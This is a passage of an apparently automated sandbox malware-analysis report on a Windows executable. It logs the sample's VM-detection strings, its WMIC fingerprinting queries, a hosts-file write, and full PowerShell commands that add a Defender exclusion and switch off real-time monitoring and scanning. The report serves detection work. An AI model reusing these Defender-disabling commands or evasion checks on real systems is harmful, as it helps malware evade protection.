              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Memory allocated: 1ED08530000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Memory allocated: 1ED22090000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 598578
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Window / User API: threadDelayed 4826
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Window / User API: threadDelayed 4869
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4274
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2362
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1208
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4149
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3528
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1133
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99890s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99781s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99671s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99562s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99453s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99343s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99234s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99125s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -99015s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -98906s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -98796s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -98687s >= -30000s
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332 Thread sleep time: -598578s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468 Thread sleep count: 5480 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468 Thread sleep count: 4274 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856 Thread sleep count: 2362 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088 Thread sleep count: 1208 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220 Thread sleep count: 4149 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664 Thread sleep count: 68 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6264 Thread sleep count: 3528 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888 Thread sleep count: 1133 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 100000
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99890
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99781
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99671
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99562
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99453
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99343
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99234
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99125
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 99015
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 98906
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 98796
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 98687
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Thread delayed: delay time: 598578
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr Binary or memory string: vboxtray
              Source: 4z5ru.scr.0.dr Binary or memory string: vboxservice
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr Binary or memory string: qemu-ga
              Source: apDMcnqqWs.exe, 00000000.00000002.2592302123.000001ED08634000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
              Source: powershell.exe, 00000012.00000002.2531315049.000002CB4C076000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWme
              Source: 4z5ru.scr.0.dr Binary or memory string: vmwareuser
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.dr Binary or memory string: vmusrvc
              Source: 4z5ru.scr.0.dr Binary or memory string: vmwareservice+discordtokenprotector
              Source: powershell.exe, 00000012.00000002.2531315049.000002CB4C050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: 4z5ru.scr.0.dr Binary or memory string: vmsrvc
              Source: 4z5ru.scr.0.dr Binary or memory string: vmtoolsd
              Source: 4z5ru.scr.0.dr Binary or memory string: vmwaretray
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Users\user\Desktop\apDMcnqqWs.exe VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
